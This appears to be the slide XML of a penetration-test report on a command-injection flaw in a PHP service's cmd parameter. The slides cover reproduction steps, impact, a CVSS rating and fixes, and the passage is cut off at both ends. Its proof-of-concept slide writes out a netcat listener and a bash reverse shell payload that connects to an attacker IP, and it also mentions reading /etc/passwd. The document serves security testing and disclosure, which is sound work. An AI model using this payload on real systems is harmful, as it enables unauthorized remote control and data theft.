            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyzed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and found unsensitized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injected OS commands to confirm code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executed reverse shell and gained full remote control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used elevated access for post-exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C691ED4-5DDD-EE6C-EB82-68D2F676EEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="37465"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7722145" y="637057"/>
            <a:ext cx="4118963" cy="2280187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D1D0E7A-A88A-D537-61E6-C20939C92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9636" y="3576469"/>
            <a:ext cx="4161472" cy="1648460"/>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2627178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3E6C0-E072-B182-54A4-ED2373C08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F91EB0-82E4-5224-9593-097F9B1AE012}"/>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5B2E68B4-A1E9-AF2D-4824-D21511994694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="7424531" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Identify Vulnerable Endpoint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Find a URL parameter triggering command execution (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, command).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Test for Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Append a harmless command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    (e.g., ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Verify Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Check if the command output </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    (e.g., current user) appears in the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Escalate Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Inject commands to read files </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>), spawn shells, or exfiltrate data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Immediate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Unauthorized command execution, enabling system control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Long-Term:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Persistence: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Backdoor installation (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> jobs, web shells).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Data Exfiltration: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Theft of credentials, databases, or intellectual property.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Regulatory Consequences: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>GDPR/HIPAA violations due to data breaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44601674-D1A4-1307-2F98-9954C84AD461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7484747" y="1895248"/>
            <a:ext cx="3935314" cy="2400508"/>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1295920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14088-0B4A-A650-2C74-26C4E7A47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CB2460-9633-90B6-1EE5-402E84EF712B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Reverse Shell Execution via RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99619AC2-3637-5413-D1DC-38F4D4E84A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Reverse Shell Execution via Remote Code Execution (RCE) Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The internal web service running on port 9999 includes an RCE vulnerability via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parameter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. By exploiting this flaw, the attacker was able to inject a reverse shell payload, enabling a persistent remote connection to the target system from the tester’s machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Combines RCE with persistent access, enabling full system control. Exploitable remotely without authentication, leading to complete compromise of confidentiality, integrity, and availability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows full system access remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables command execution, persistence, and control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypasses firewalls and network restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High risk of lateral movement, data exfiltration, and privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove or sanitize the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter and avoid using system-level functions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>exec() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restrict internal services using firewall or localhost-only access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor for unusual outgoing connections or tunneling behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement proper authentication and authorization on internal endpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3392999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56158-61AA-6385-E374-31EE5990A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45DBB-8B6B-C16C-830A-A75471C9F591}"/>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6B2B6D37-11B5-4306-1749-75786964C74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Score:  9.8 (Critical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/Command_Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://highon.coffee/blog/reverse-shell-cheat-sheet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1900" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Set up a listener on the attacker's machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Trigger the reverse shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>SSH access granted using reused credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Port 9999 exposed via SSH tunnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Identified RCE in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>index.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Crafted and sent reverse shell payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Attacker received a full shell on their system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Used shell for command execution and privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073311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5893B-4733-6F6F-89BD-EF7D70D1E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4EFCE-1568-81D7-739D-D461A778ECD8}"/>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8E18E9AE-AF1E-FE9D-A06C-7E1734945B96}"/>
